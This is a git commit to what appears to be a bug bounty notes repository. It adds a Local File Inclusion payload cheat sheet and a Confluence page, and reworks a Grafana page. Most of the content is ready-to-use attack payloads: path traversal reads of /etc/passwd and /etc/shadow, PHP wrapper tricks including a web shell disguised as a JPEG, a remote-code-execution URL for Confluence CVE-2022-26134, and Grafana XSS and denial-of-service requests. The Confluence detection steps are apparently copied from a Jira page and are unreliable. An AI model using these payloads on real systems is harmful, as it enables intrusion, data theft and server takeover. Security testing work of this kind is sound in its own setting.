Add LFI + Confluence and fix grafana structure

This commit is contained in:
Muhammad Daffa 2022-06-18 21:40:38 +07:00
parent a0048665a1
commit f2880660c0
5 changed files with 144 additions and 9 deletions

View File

@ -1 +1,94 @@
# Soon! ## Local File Inclusion
## Introduction
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server
## How to exploit
1. Basic payload
```
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../../../../../../../../../../etc/shadow
```
2. URL encoding
```
http://example.com/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```
3. Double encoding
```
http://example.com/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd
```
4. UTF-8 encoding
```
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```
5. Using Null Byte (%00)
```
http://example.com/index.php?page=../../../etc/passwd%00
```
6. From an existent folder
```
http://example.com/index.php?page=scripts/../../../../../etc/passwd
```
7. Path truncation
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
```
8. Using PHP Wrappers: filter
```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=config.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=config.php
```
9. Using PHP Wrappers: zlib
```
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/shadow
```
10. Using PHP Wrappers: zip
```
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
11. Using PHP Wrappers: data
```
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
```
12. Using PHP Wrappers: expect
```
http://example.com/index.php?page=expect://ls
```
13. Using PHP Wrappers: input
```
POST /index.php?page=php://input&cmd=ls HTTP/1.1
Host: example.com
...
<?php echo shell_exec($_GET['cmd']); ?>
```
14. Some unique bypass
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=/.%2e/.%2e/.%2e/.%2e/etc/passwd
http://example.com/index.php?page=/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
```
## References
* [Aptive](https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/)

View File

@ -15,7 +15,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md) - [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md) - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
- Local File Inclusion (SOON) - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md) - [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
- SQL Injection (SOON) - SQL Injection (SOON)
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md) - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
@ -41,6 +41,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
## Technologies ## Technologies
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)

View File

@ -0,0 +1,27 @@
# Confluence Common Bugs
## Introduction
What would you do if you came across a website that uses Confluence?
## How to Detect
```
https://example.com/secure/Dashboard.jspa
https://example.com/login.jsp
```
1. Find the related CVE by checking Confluence version
* How to find the Confluence version
Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the Confluence version. If you found outdated Confluence version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-6258/Atlassian-Confluence.html)
Some example CVE:
- CVE-2022-26134 (Remote Code Execution)
```
https://example.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
```
- CVE-2021-26085 (Arbitrary File Read)
```
https://example.com/s/test/_/;/WEB-INF/web.xml
```

View File

@ -1,13 +1,27 @@
# Grafana # Grafana
1. CVE-2021-41174 (Reflected XSS)
## Introduction
What would you do if you came across a website that uses Grafana?
## How to Detect
Try to HTTP request to `https://example.com/login` and there is a form login
1. Find the related CVE by checking grafana version
* How to find the grafana version
Try to request to `https://example.com/login` and then check the source code. You will find the version in JSON body `"isEnterprise":false,"latestVersion:"9.0.0","version":"8.3.2"` so 8.3.2 is the grafana version. If you found outdated grafana version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-18548/product_id-47055/Grafana-Grafana.html)
Some example CVE:
- CVE-2021-41174 (Reflected XSS)
``` ```
https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
``` ```
2. CVE-2020-13379 (Denial of Service) - CVE-2020-13379 (Denial of Service)
``` ```
https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
``` ```
3. CVE-2020-11110 (Stored XSS) - CVE-2020-11110 (Stored XSS)
``` ```
POST /api/snapshots HTTP/1.1 POST /api/snapshots HTTP/1.1
Host: example.com Host: example.com
@ -19,7 +33,7 @@ Connection: close
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
``` ```
4. CVE-2019-15043 (Grafana Unauthenticated API) - CVE-2019-15043 (Grafana Unauthenticated API)
``` ```
POST /api/snapshots HTTP/1.1 POST /api/snapshots HTTP/1.1
Host: example.com Host: example.com
@ -31,11 +45,11 @@ Content-Type: application/json
{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
``` ```
5. Default Credentials 2. Default Credentials
``` ```
Try to login using admin as username and password Try to login using admin as username and password
``` ```
6. Signup Enabled 3. Signup Enabled
``` ```
https://example.com/signup https://example.com/signup
``` ```

View File

@ -12,7 +12,7 @@ https://example.com/login.jsp
1. Find the related CVE by checking jira version 1. Find the related CVE by checking jira version
* How to find the jira version * How to find the jira version
Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html) Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the jira version. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)
Some example CVE: Some example CVE: